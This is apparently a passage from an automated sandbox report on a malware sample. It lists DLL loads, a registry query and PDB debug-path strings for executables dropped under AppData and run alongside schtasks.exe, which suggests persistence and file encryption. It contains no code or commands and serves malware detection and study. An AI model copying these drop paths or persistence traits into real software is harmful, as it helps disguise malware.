Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\R5391762lf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: R5391762lf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\41\\5bU)% source: R5391762lf.exe, 00000007.00000003.2101462932.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ m[%K source: R5391762lf.exe, 00000007.00000003.2081897313.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2098573555.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100791102.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2080641815.0000000003787000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079360767.00000000036F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2136464726.000000000379F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146776038.00000000037AF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\\* source: R5391762lf.exe, 00000007.00000003.2135353595.0000000003BE6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\Hq source: R5391762lf.exe, 00000007.00000003.1681931238.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681857238.0000000003192000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\S source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\kL source: R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\ar-IQ\\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ABA671~1A8E3aba6710fde0876af_0ata\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\NV, source: R5391762lf.exe, 00000007.00000003.2068868095.0000000003538000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2066983991.000000000351F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049588960.0000000003505000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049773121.0000000003517000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\8\) source: R5391762lf.exe, 00000007.00000003.2068625676.0000000003494000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067121029.0000000003429000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067819538.0000000003491000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2136303536.0000000003B65000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2102031776.00000000038A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101371339.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\+D> source: R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2101597700.0000000003ACA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: R5391762lf.exe, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ache\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2083769242.0000000003878000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2079953062.000000000382C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\d source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068464910.0000000003838000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.2161457141.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147352148.0000000003A91000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.1681500127.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946799099.00000000033B3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682385197.000000000339B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1948192992.00000000033B7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1622139551.0000000003386000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681962371.0000000003398000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\2a source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068555631.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\W source: R5391762lf.exe, 00000007.00000003.1682135563.000000000315F000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682296747.000000000316C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682038409.000000000315E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1684204652.0000000003170000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1682185359.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\s\ source: R5391762lf.exe, 00000007.00000003.1948567038.0000000003699000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049541715.0000000003691000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC\Temp\d.pdb\ source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ngs\ source: R5391762lf.exe, 00000007.00000003.2135149537.00000000033A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: R5391762lf.exe, 00000000.00000002.1374077836.0000000005EA0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397075363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, R5391762lf.exe, 00000005.00000002.1405257408.0000000005DB0000.00000040.00001000.00020000.00000000.sdmp, R5391762lf.exe, 00000006.00000002.1411124880.0000000005EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ta\5 source: R5391762lf.exe, 00000007.00000003.2161564877.0000000003E55000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: mstsca.exe, 00000021.00000000.3275270168.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: R5391762lf.exe, 00000007.00000003.2102219376.0000000003B45000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2101597700.0000000003B45000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049327479.0000000003858000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050729410.0000000003870000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2068384745.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: _C:\tofagehu\hiv.pdb source: R5391762lf.exe, 00000000.00000000.1365440142.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000000.00000002.1371228997.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000002.00000000.1368723855.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000000.1393141835.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000005.00000002.1402790668.0000000000412000.00000002.00000001.01000000.00000003.sdmp, R5391762lf.exe, 00000006.00000000.1394677978.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000006.00000002.1407678085.0000000000412000.00000002.00000001.01000000.00000007.sdmp, R5391762lf.exe, 00000007.00000003.1491373512.00000000097E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1681707652.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1621610422.0000000003469000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\re\ source: R5391762lf.exe, 00000007.00000003.2163523307.000000000394E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2148622885.0000000003909000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161507868.000000000391E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2146207325.00000000038A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Y source: R5391762lf.exe, 00000007.00000003.2160881212.00000000038A9000.00000004.00000020.00020000.00000000.sdmp
